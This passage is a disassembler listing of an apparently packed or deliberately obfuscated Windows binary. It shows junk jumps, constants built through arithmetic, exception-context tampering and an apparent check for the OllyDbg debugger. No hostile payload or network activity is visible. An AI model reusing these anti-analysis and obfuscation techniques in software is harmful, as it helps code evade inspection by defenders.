adc edi, 0EEDE5D20h
jmp loc_4248E5
; =============== S U B R O U T I N E =======================================
sub_4250F7 proc near ; CODE XREF: sub_423324:loc_427EAE�p
; _94j21ax3:00429D58�j
; FUNCTION CHUNK AT 0042174C SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042392A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042825F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429D47 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00429DDC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B02B SIZE 0000000B BYTES
mov [esp+0], ebx
pop ebx
add eax, 5BB1416Ch
mov eax, [eax]
or eax, eax
jmp loc_42825F
sub_4250F7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42510A proc near ; CODE XREF: sub_421C84+5�p
; _94j21ax3:00426FFF�j
mov [esp+0], ebx
pop ebx
pushf
push offset loc_4287E4
jmp locret_425B16
sub_42510A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424EB4
loc_425119: ; CODE XREF: sub_424EB4+69F2�j
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_424EB4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428993
loc_42511D: ; CODE XREF: sub_428993+1DCB�j
jmp loc_42AD49
; END OF FUNCTION CHUNK FOR sub_428993
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB30
loc_425122: ; CODE XREF: sub_42AB30-63C0�j
jmp nullsub_126
; END OF FUNCTION CHUNK FOR sub_42AB30
; =============== S U B R O U T I N E =======================================
sub_425127 proc near ; CODE XREF: sub_424EB4+69EA�p
mov dword ptr [eax], 0
retn
sub_425127 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42966A
loc_42512E: ; CODE XREF: sub_42966A+C�j
jmp loc_423353
; END OF FUNCTION CHUNK FOR sub_42966A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A9F
loc_425133: ; CODE XREF: sub_426A9F+18�j
jmp loc_425A3D
; END OF FUNCTION CHUNK FOR sub_426A9F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B5E
loc_425138: ; CODE XREF: sub_428B5E-5B3B�j
jmp loc_423123
; END OF FUNCTION CHUNK FOR sub_428B5E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_42513D: ; CODE XREF: sub_4272E9-4542�j
cdq
jnb loc_422CFD
loc_425144: ; CODE XREF: sub_4272E9:loc_42B5A6�j
call sub_427ABD
retn
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232F5
loc_42514A: ; CODE XREF: sub_4232F5+9106�j
jmp loc_42A3A2
; END OF FUNCTION CHUNK FOR sub_4232F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A81A
loc_42514F: ; CODE XREF: sub_42A81A:loc_42545A�j
call sub_4247A2
xor eax, eax
retn
; END OF FUNCTION CHUNK FOR sub_42A81A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425157 proc near ; DATA XREF: sub_4272E9-46DA�o
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0042241B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004275C6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042B8C5 SIZE 00000007 BYTES
push ebp
mov ebp, esp
xchg ecx, esi
push esi
jmp loc_42241B
sub_425157 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_425162: ; CODE XREF: _94j21ax3:00429D76�j
jns loc_4223B6
; =============== S U B R O U T I N E =======================================
sub_425168 proc near ; CODE XREF: sub_42BF1B�p
mov [esp+0], ebx
pop ebx
push ebp
mov ebp, esp
push eax
call sub_42A77E
loc_425175: ; CODE XREF: sub_426985+494C�j
jmp nullsub_30
sub_425168 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42291D
loc_42517A: ; CODE XREF: sub_42291D+E�j
jmp loc_42B96A
; END OF FUNCTION CHUNK FOR sub_42291D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421656
loc_42517F: ; CODE XREF: sub_421656+13�j
jmp loc_426F8C
; END OF FUNCTION CHUNK FOR sub_421656
; ---------------------------------------------------------------------------
xor eax, 68E7C845h
jmp sub_424EB4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C24F
loc_42518F: ; CODE XREF: sub_42C24F-8244�j
; sub_42C24F:loc_4258A3�j
call sub_42574E
push 0AD8DC64Fh
mov edx, offset sub_4251A2
xchg edx, [esp+0]
locret_4251A1: ; CODE XREF: _94j21ax3:00421B7F�j
retn
; END OF FUNCTION CHUNK FOR sub_42C24F
; =============== S U B R O U T I N E =======================================
sub_4251A2 proc near ; DATA XREF: sub_42C24F-70B6�o
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00424F52 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042BA0A SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0042C3CC SIZE 00000005 BYTES
or edx, 61B7D563h
xor edx, 533336D8h
call sub_4239A5
jmp loc_424F52
sub_4251A2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422866
loc_4251B8: ; CODE XREF: sub_422866:loc_424EC8�j
xchg eax, edi
shr esi, 1
jmp sub_423C10
; END OF FUNCTION CHUNK FOR sub_422866
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425934
loc_4251C1: ; CODE XREF: sub_425934+5813�j
push eax
retn
; END OF FUNCTION CHUNK FOR sub_425934
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_4251C3: ; CODE XREF: sub_4272E9+4F9A�j
call sub_42C057
test al, al
jz loc_42591C
jmp loc_42B5A6
; END OF FUNCTION CHUNK FOR sub_4272E9
; =============== S U B R O U T I N E =======================================
sub_4251D5 proc near ; CODE XREF: _94j21ax3:0042244F�j
; sub_423614+304D�p
arg_0 = dword ptr 4
mov [esp+0], esi
pop esi
xchg ebp, [esp-4+arg_0]
retn
sub_4251D5 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_207. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA5F
loc_4251DE: ; CODE XREF: sub_42AA5F+9�j
jmp loc_42153A
; END OF FUNCTION CHUNK FOR sub_42AA5F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272C3
loc_4251E3: ; CODE XREF: sub_4272C3+10�j
jmp loc_42A207
; END OF FUNCTION CHUNK FOR sub_4272C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_4251E8: ; CODE XREF: sub_423614:loc_422A56�j
call sub_42B238
; END OF FUNCTION CHUNK FOR sub_423614
; START OF FUNCTION CHUNK FOR sub_42B238
loc_4251ED: ; CODE XREF: sub_42B238-49EF�j
jmp loc_42657F
; END OF FUNCTION CHUNK FOR sub_42B238
; =============== S U B R O U T I N E =======================================
sub_4251F2 proc near ; CODE XREF: _94j21ax3:004217EE�j
; _94j21ax3:0042C0EA�p
xchg edx, [esp+0]
pop edx
test al, al
jz loc_421242
jmp loc_429176
sub_4251F2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_425203: ; DATA XREF: sub_429897+7�o
cmp dword ptr [ebp-4], 100h
jnz loc_4230B9
; START OF FUNCTION CHUNK FOR sub_422973
loc_425210: ; CODE XREF: sub_4248E7:loc_421FF7�j
; sub_422973+804D�j ...
call sub_427087
loc_425215: ; CODE XREF: sub_42BA8A-84E1�j
jmp loc_4285E6
; END OF FUNCTION CHUNK FOR sub_422973
; ---------------------------------------------------------------------------
loc_42521A: ; CODE XREF: _94j21ax3:loc_426E94�j
push eax
mov eax, [ebp-4]
call sub_422866
; START OF FUNCTION CHUNK FOR sub_425330
loc_425223: ; CODE XREF: sub_425330+452D�j
jmp loc_426E3B
; END OF FUNCTION CHUNK FOR sub_425330
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_425228: ; CODE XREF: sub_423FCD+5ADD�j
ja loc_426A49
jmp loc_42B064
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A277
loc_425233: ; CODE XREF: sub_42A277-72C6�j
; sub_42A277:loc_42B1F7�j
call sub_42574E
mov edx, 0F75CA70h
call sub_4239A5
push eax
jmp loc_425AC1
; END OF FUNCTION CHUNK FOR sub_42A277
; ---------------------------------------------------------------------------
loc_425248: ; CODE XREF: _94j21ax3:0042B3BA�j
mov eax, offset dword_426F48
call sub_428AE1
lea eax, [ebp-14h]
push eax
jmp loc_423CAF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_68. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422048
loc_42525C: ; CODE XREF: sub_422048+7E8E�j
jmp nullsub_90
; END OF FUNCTION CHUNK FOR sub_422048
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C057
loc_425261: ; CODE XREF: sub_42C057-3E73�j
jmp loc_4226C6
; END OF FUNCTION CHUNK FOR sub_42C057
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_76. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421480
loc_425267: ; CODE XREF: sub_421480+2AAD�j
; sub_423FCD:loc_42BB70�j
jmp loc_421ADC
; END OF FUNCTION CHUNK FOR sub_421480
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_42526C: ; CODE XREF: sub_428BBD-7523�j
; sub_4220B7:loc_429CE1�j
push edi
push 83956DC0h
pop edi
xor edi, 67CC5FCAh
cmp edi, 26595812h
jmp loc_42BDB8
; END OF FUNCTION CHUNK FOR sub_428BBD
; ---------------------------------------------------------------------------
loc_425284: ; CODE XREF: _94j21ax3:004291EF�j
not ebp
adc ebx, 0EC299605h
xchg ebp, [ebx]
loc_42528E: ; CODE XREF: _94j21ax3:loc_4291DC�j
add edx, 0F242B647h
call sub_4239A5
call sub_421B3A
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_42529E: ; CODE XREF: sub_4294B3-2BCD�j
jnz loc_42214D
jmp loc_42682A
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42454E
loc_4252A9: ; CODE XREF: sub_42454E-12B�j
mov ebp, edx
mov [esi], edi
cdq
not ebx
jmp loc_42B752
; END OF FUNCTION CHUNK FOR sub_42454E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427849
loc_4252B5: ; CODE XREF: sub_427849-403F�j
; sub_427849+1A�j
inc dword ptr [ebp-4]
jmp loc_42784F
; END OF FUNCTION CHUNK FOR sub_427849
; =============== S U B R O U T I N E =======================================
sub_4252BD proc near ; CODE XREF: sub_42484C+7BFB�p
arg_8 = dword ptr 0Ch
call sub_42291D
push ecx
mov ecx, [esp+4+arg_8]
mov dword ptr [ecx], 10001h
lea eax, loc_42290B
push offset sub_42703A
jmp nullsub_31
sub_4252BD endp
; =============== S U B R O U T I N E =======================================
sub_4252DD proc near ; DATA XREF: sub_42ABCE:loc_4270CF�o
mov eax, [ebp-20h]
movzx eax, byte ptr [eax]
mov [ebp-1Ch], eax
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
push offset loc_424653
jmp loc_42334E
sub_4252DD endp
; =============== S U B R O U T I N E =======================================
sub_4252F6 proc near ; CODE XREF: _94j21ax3:004254A3�j
; _94j21ax3:004266AA�p
xchg edi, [esp+0]
pop edi
mov [ebx], eax
pop ebx
retn
sub_4252F6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4252FE: ; CODE XREF: _94j21ax3:00429876�j
xchg edi, [ebp+0]
; =============== S U B R O U T I N E =======================================
sub_425301 proc near ; CODE XREF: _94j21ax3:0042C2C3�p
; FUNCTION CHUNK AT 0042B228 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042BEA2 SIZE 0000000A BYTES
xchg edx, [esp+0]
pop edx
pop esi
mov eax, [ebp-0Ch]
mov ecx, 3FDh
jmp loc_42B228
sub_425301 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428381
loc_425313: ; CODE XREF: sub_428381+3AF0�j
jz loc_423E83
jmp loc_4256F0
; END OF FUNCTION CHUNK FOR sub_428381
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_42. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42531F: ; CODE XREF: _94j21ax3:0042919F�j
jmp locret_421DF2
; =============== S U B R O U T I N E =======================================
sub_425324 proc near ; CODE XREF: sub_426562�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00421DBD SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004230D0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00426475 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427C5F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428981 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428CAA SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042A630 SIZE 00000007 BYTES
push ebx
push ecx
call sub_425983
loc_42532B: ; CODE XREF: sub_42265F-4EF�j
jmp loc_428981
sub_425324 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425330 proc near ; DATA XREF: sub_424DB4+1�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00422283 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042229F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425223 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426E2E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00429859 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042A024 SIZE 00000012 BYTES
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
loc_425341: ; CODE XREF: _94j21ax3:loc_4227C5�j
jmp loc_422283
sub_425330 endp
; ---------------------------------------------------------------------------
loc_425346: ; CODE XREF: _94j21ax3:00425960�j
add edx, 0E5A39772h
; START OF FUNCTION CHUNK FOR sub_4259BF
loc_42534C: ; CODE XREF: sub_4259BF:loc_425943�j
and ecx, 35EA66Fh
xor ecx, 0A766A0ECh
add ebx, ecx
jmp loc_42468D
; END OF FUNCTION CHUNK FOR sub_4259BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_42535F: ; CODE XREF: sub_42169F+2776�j
jnz loc_427DAF
jmp loc_424A42
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AE5A
loc_42536A: ; CODE XREF: sub_42AE5A-9CF3�j
pop ebp
push esi
pushf
push 0D8ADF57Fh
pop esi
jmp loc_429478
; END OF FUNCTION CHUNK FOR sub_42AE5A
; ---------------------------------------------------------------------------
push eax
call dword ptr [ebp-4]
test eax, eax
jz loc_426C46
jmp loc_4236EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272B2
loc_425389: ; CODE XREF: sub_4272B2+6�j
mov eax, esi
push offset sub_42430C
jmp nullsub_85
; END OF FUNCTION CHUNK FOR sub_4272B2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_425395 proc near ; CODE XREF: sub_426B65:loc_429D42�j
retn
sub_425395 endp
; ---------------------------------------------------------------------------
jge loc_421DED
jmp sub_426602
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424EE4
loc_4253A1: ; CODE XREF: sub_424EE4:loc_4287AA�j
pushf
push 0D51DCAFAh
pop eax
add eax, 364C68BDh
sub eax, 87AC45E3h
xor eax, 5ADF35F7h
popf
jnz loc_42A69B
jmp loc_422E99
; END OF FUNCTION CHUNK FOR sub_424EE4
; ---------------------------------------------------------------------------
loc_4253C6: ; CODE XREF: _94j21ax3:loc_42B088�j
add eax, ebp
add eax, 0D62C5CF7h
mov eax, [eax]
neg eax
call sub_424FE0
loc_4253D7: ; DATA XREF: sub_42922A-AF5�o
push 0D2315AC2h
pop ecx
and ecx, 2706055Eh
sub ecx, 9FE4E114h
add ecx, 9E2715B0h
xchg ecx, [esp]
jmp sub_42BA8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429A83
loc_4253F7: ; CODE XREF: sub_429A83:loc_42206B�j
pushf
jmp loc_423038
; END OF FUNCTION CHUNK FOR sub_429A83
; ---------------------------------------------------------------------------
and ebx, 2C00FFF6h
test edx, edi
jmp loc_42861A
; =============== S U B R O U T I N E =======================================
sub_42540A proc near ; CODE XREF: sub_423A56+29A1�p
xchg edx, [esp+0]
mov edx, [esp+0]
call sub_426CF4
sub_42540A endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42A7FC
loc_425415: ; CODE XREF: sub_42A7FC:loc_4287D8�j
xchg ecx, [esp+0]
call sub_423F43
retn
; END OF FUNCTION CHUNK FOR sub_42A7FC
; =============== S U B R O U T I N E =======================================
sub_42541E proc near ; CODE XREF: sub_42191F:loc_427DBF�p
; sub_42BDD7+8�p
; FUNCTION CHUNK AT 0042BED7 SIZE 00000005 BYTES
js sub_42C3BD
jmp loc_42BED7
sub_42541E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_425429: ; CODE XREF: sub_4294B3:loc_422BB4�j
jz loc_42388F
jmp loc_424263
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DB5
loc_425434: ; CODE XREF: sub_423DB5:loc_423F7A�j
add eax, ebp
push edi
push 5456C2C9h
pop edi
add edi, 0B05DCBB9h
jmp loc_427F00
; END OF FUNCTION CHUNK FOR sub_423DB5
; =============== S U B R O U T I N E =======================================
sub_425448 proc near ; CODE XREF: _94j21ax3:0042230D�j
; _94j21ax3:00425B68�p
xchg edi, [esp+0]
pop edi
add eax, 9857E540h
mov eax, [eax]
call nullsub_182
retn
sub_425448 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A81A
loc_42545A: ; CODE XREF: sub_42A81A+11�j
jmp loc_42514F
; END OF FUNCTION CHUNK FOR sub_42A81A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_182. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BC39
loc_425460: ; CODE XREF: sub_42BC39+8�j
jg loc_42AA44
jmp loc_4233FB
; END OF FUNCTION CHUNK FOR sub_42BC39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_42546B: ; CODE XREF: sub_422EB0:loc_428E4E�j
mov edx, 6DD450Eh
jmp loc_42B9B5
; END OF FUNCTION CHUNK FOR sub_422EB0
; =============== S U B R O U T I N E =======================================
sub_425475 proc near ; CODE XREF: _94j21ax3:004227C0�j
; _94j21ax3:004246CF�p
mov [esp+0], esi
pop esi
call sub_42265F
sub_425475 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_42547E: ; CODE XREF: sub_428BBD:loc_428298�j
mov eax, [ebp-80Ch]
push eax
push ebx
push 116E669Bh
pop ebx
jmp loc_427DE7
; END OF FUNCTION CHUNK FOR sub_428BBD
; ---------------------------------------------------------------------------
sub ebx, 22DDDC18h
jmp sub_429251
; ---------------------------------------------------------------------------
mov esi, 0C8E3AE14h
sub ecx, ebx
jmp sub_4252F6
; ---------------------------------------------------------------------------
loc_4254A8: ; CODE XREF: _94j21ax3:loc_4223B6�j
jl loc_4274B1
; =============== S U B R O U T I N E =======================================
sub_4254AE proc near ; CODE XREF: sub_422707�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00426401 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004290D0 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
xchg ecx, [esp-4+arg_0]
mov ecx, [esp-4+arg_0]
mov esp, ebp
jmp loc_4290D0
sub_4254AE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422E43
loc_4254BF: ; CODE XREF: sub_422E43+1�j
pop edx
pop ebp
jmp loc_426485
; END OF FUNCTION CHUNK FOR sub_422E43
; [00000005 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
db 5Bh
dd 32D68841h, 7E816E07h, 90BC2896h, 0F156B2A8h, 68A94D4h
dd 47078846h, 775DB01h, 0EE831E8Bh, 72DB11FCh, 3B01B8EDh
dd 0DB01D1DDh, 1E8B0775h, 11FCEE83h, 1C011DBh, 75EF77DBh
dd 831E8B09h, 9EE9FCEEh, 0C1000002h, 5AE906CEh, 57FFFFEFh
dd 0FFD070E9h
db 0FFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_177. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_425522: ; CODE XREF: sub_42C0BC+E�j
jmp loc_4217F3
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4281A5
loc_425527: ; CODE XREF: sub_4281A5-6CF0�j
jmp loc_4269E5
; END OF FUNCTION CHUNK FOR sub_4281A5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_72. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42552D proc near ; CODE XREF: _94j21ax3:00427B6B�j
; _94j21ax3:00427B8C�p
; FUNCTION CHUNK AT 0042B29F SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
mov [ebp-20h], eax
jmp loc_42B29F
sub_42552D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_425539 proc near ; CODE XREF: sub_42BDF4+7�p
; FUNCTION CHUNK AT 0042135D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042378F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004290EA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042A7CA SIZE 00000020 BYTES
push ebp
jmp loc_42135D
sub_425539 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_19. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B856
loc_425540: ; CODE XREF: sub_42B856:loc_424950�j
pushf
jnb loc_422D97
jmp loc_42ACD9
; END OF FUNCTION CHUNK FOR sub_42B856
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427344
loc_42554C: ; CODE XREF: sub_427344:loc_425BC8�j
call sub_425868
loc_425551: ; CODE XREF: sub_429BC2+9�j
jmp sub_421656
; END OF FUNCTION CHUNK FOR sub_427344
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_425556: ; CODE XREF: sub_423324:loc_423369�j
push 0B7A2CD03h
pop edx
push offset loc_42B184
jmp loc_424A02
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
loc_425566: ; CODE XREF: _94j21ax3:loc_4210D7�j
; _94j21ax3:004210EA�j ...
add esi, 0C03FFAC6h
xchg esi, [esp]
push 2
lea eax, [ebp-400h]
push eax
jmp loc_4288AA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42557D: ; CODE XREF: sub_42284F+677�j
ja nullsub_88
jmp loc_4296DC
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4268C1
loc_425588: ; CODE XREF: sub_4268C1+16�j
push offset sub_429848
jmp loc_426D0B
; END OF FUNCTION CHUNK FOR sub_4268C1
; ---------------------------------------------------------------------------
shr edx, 19h
jmp sub_4292D7
; =============== S U B R O U T I N E =======================================
sub_42559A proc near ; CODE XREF: sub_42AC17+C�p
; _94j21ax3:0042BAED�j
arg_10 = dword ptr 14h
; FUNCTION CHUNK AT 00423683 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423E20 SIZE 00000004 BYTES
xchg edi, [esp+0]
pop edi
mov ecx, [esp+10h]
mov dword ptr [ecx], 10001h
lea eax, loc_423AB6
mov [ecx+0B8h], eax
jmp loc_423683
sub_42559A endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_63. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422AD5
loc_4255BA: ; CODE XREF: sub_422AD5+E�j
jmp loc_426591
; END OF FUNCTION CHUNK FOR sub_422AD5
; =============== S U B R O U T I N E =======================================
sub_4255BF proc near ; CODE XREF: sub_42284F+2EC9�p
; _94j21ax3:00428D9B�j
arg_0 = dword ptr 4
xchg ecx, [esp+0]
pop ecx
add edx, 88868689h
xchg edx, [esp-4+arg_0]
jmp sub_425A09
sub_4255BF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_4255D1: ; CODE XREF: sub_4272E9+23BC�j
jnz loc_429762
jmp loc_4265EF
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_4255DC: ; CODE XREF: sub_421D33:loc_428D7B�j
; sub_421D33+7057�j
xor eax, 245F375Dh
add eax, ebp
add eax, 0AD5E15DEh
mov dword ptr [eax], 594C4C4Fh
jmp loc_42344C
; END OF FUNCTION CHUNK FOR sub_421D33
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_35. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_4255F6: ; CODE XREF: sub_422EB0+6B0B�j
jmp loc_4212BA
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
loc_4255FB: ; CODE XREF: _94j21ax3:004242F4�j
jmp loc_42C0AC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421644
loc_425600: ; CODE XREF: sub_421644+2C2�j
jmp nullsub_34
; END OF FUNCTION CHUNK FOR sub_421644
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_75. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_425606: ; CODE XREF: _94j21ax3:00424981�j
jmp loc_426B19
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_42560B: ; CODE XREF: sub_42C0BC-9FDC�j
jmp loc_421F9D
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_425610: ; CODE XREF: sub_422EB0-1AB3�j
jge sub_428620
jbe loc_426CE8
mov edi, [ebp+0]
sbb edx, 6C21A313h
jmp loc_4269FD
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42270C
loc_42562A: ; CODE XREF: sub_42270C+E�j
jz loc_423148
jmp loc_428217
; END OF FUNCTION CHUNK FOR sub_42270C
; ---------------------------------------------------------------------------
loc_425635: ; CODE XREF: _94j21ax3:004242E0�j
mov ebp, esp
push edx
push offset sub_427F1C
jmp locret_42BD89
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_425642: ; CODE XREF: sub_423324:loc_427737�j
rol ecx, 1Ch
cmp ecx, esi
jmp loc_4223C3
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
mov eax, 8FDFF1E4h
jmp sub_421126
; ---------------------------------------------------------------------------
loc_425656: ; DATA XREF: sub_422EB0+1148�o
add eax, ebp
add eax, 15971ED6h
mov eax, [eax]
mov dword ptr [ebp+eax*4-70h], 73257325h
inc dword ptr [ebp-8]
cmp dword ptr [ebp-8], 19h
jmp loc_42A263
; ---------------------------------------------------------------------------
shl ebx, 0Ah
jmp sub_42166E
; ---------------------------------------------------------------------------
loc_42567C: ; DATA XREF: sub_425819-34FD�o
cmp ebx, 0D96A5251h
sub eax, 95B6D5DDh
cmp ebx, eax
xor eax, 0CE9EBCA3h
pop ecx
jmp loc_4267E1
; ---------------------------------------------------------------------------
dw 5F0h
dd 0B94EFA97h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A440
loc_42569C: ; CODE XREF: _94j21ax3:loc_424AC6�j
; sub_42A440+F�j
jmp loc_42B25D
; END OF FUNCTION CHUNK FOR sub_42A440
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_4256A1: ; CODE XREF: sub_42284F+487B�j
jmp loc_421221
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
dw 31F4h
byte_4256A8 db 0CCh ; DATA XREF: sub_427ABD:loc_427AC3�o
db 0A4h, 0DCh, 0BCh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
